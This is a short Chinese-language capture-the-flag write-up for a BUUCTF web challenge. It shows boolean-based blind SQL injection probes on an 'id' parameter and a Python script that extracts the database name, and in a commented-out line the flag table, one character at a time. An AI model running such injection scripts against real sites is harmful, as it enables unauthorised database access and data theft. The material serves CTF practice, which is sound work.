id=0
id=1
id=2
id=3
发现结果不一样,尝试 : ">4","=4","<4" :
在自己的环境下验证一下:
爆一下数据库:
id=(ascii(substr(database(),1,1))>32)
''' @Modify Time @Author ------------ ------- 2019/10/25 19:28 laoalo ''' import requests from lxml import etree def a(): url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/" flag="Hello, glzjin wants a girlfriend." final="" stop=0 for i in range(1,129): print("*"*50,i,"*"*50) stop=0 for j in range(32,129): stop = j data={"id":"(ascii(substr(database(),%d,1))=%d)" %(i,j)} # data={"id":"(ascii(substr((select flag from flag),%d,1))=%d)" %(i,j)} re = requests.post(url=url,data=data).text.replace('\n','') html = etree.HTML(re).xpath("//text()") print(">>",html) if flag in html: final+=chr(j) print("\n\t\t\t\t",final) break if stop >= 128: print("*"*50,"结束") print(">>",final) break if __name__ == '__main__': a()